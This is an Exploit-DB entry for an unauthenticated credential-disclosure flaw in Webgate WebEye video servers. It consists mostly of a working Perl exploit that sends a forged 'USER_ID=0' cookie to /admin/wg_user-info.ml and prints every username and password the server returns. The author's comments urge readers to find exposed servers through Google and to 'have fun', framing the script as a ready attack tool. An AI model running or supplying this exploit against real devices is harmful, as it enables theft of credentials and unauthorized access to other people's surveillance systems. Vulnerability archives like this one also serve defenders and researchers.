Webgate WebEye - Information Disclosure

EDB-ID:

23418

CVE:

N/A


Author:

datapath

Type:

webapps


Platform:

CGI

Date:

2003-12-08


source: https://www.securityfocus.com/bid/9169/info

It has been reported that WebEye is prone to an information disclosure vulnerability that may allow an attacker to harvest sensitive information from the server such as usernames and passwords. The problem exists in the '/admin/wg_user-info.ml' script that fails to verify user credentials before returning sensitive information. 

#!/usr/bin/perl

########################################################################
# Author: datapath
# E-mail: datapath@softhome.net
# Date: Dec 2003
# 44c545672ac14e9e0f968b3affcd0740

# WHAT IS THIS?
#  This is an exploit to retrieve all username and passwords from a
#  webeye video server.

# REQUIREMENTS
#  It requires some perl libraries. If you dont have them already
#  installed, search cpan.org.

# HOW DOES IT WORKS?
#  Well, its very simple, because the server provides a mechanism (not
#  documented) to retrieve all passwords! You can read the code below,
#  its short and simple.

#  If you think its fun, but dont know any webeye video server, just make 
a
#  search in Google. You will find a lot of them! Have fun!
###########################################################################

use LWP::UserAgent;
use HTTP::Cookies;

$host=shift;

if ($host eq "") {
  print "Usage: webeye-xp.pl <host name>\n";
  exit;
}

my $browser = LWP::UserAgent->new();

my $resp = 
$browser->get("http://$host/admin/wg_user-info.ml","Cookie","USER_ID=0; 
path=/;");

$t = $resp->content;

#print $t;

$i = index($t,"<tr");
substr($t,0,$i+1,"");

while ($i!=-1) {
  $i = index($t,"<tr");
  substr($t,0,$i+1,"");
  $i = index($t,"value=");
  substr($t,0,$i+7,"");
  $j = index($t,"\"");
  $user = substr($t,0,$j);
  if ($user =~ /Apply/) { print "\nHave fun!\n"; exit; }
  print "user: ".$user;
  $i = index($t,"value=");
  substr($t,0,$i+7,"");
  $j = index($t,"\"");
  print "\tpass: ".substr($t,0,$j)."\n";
}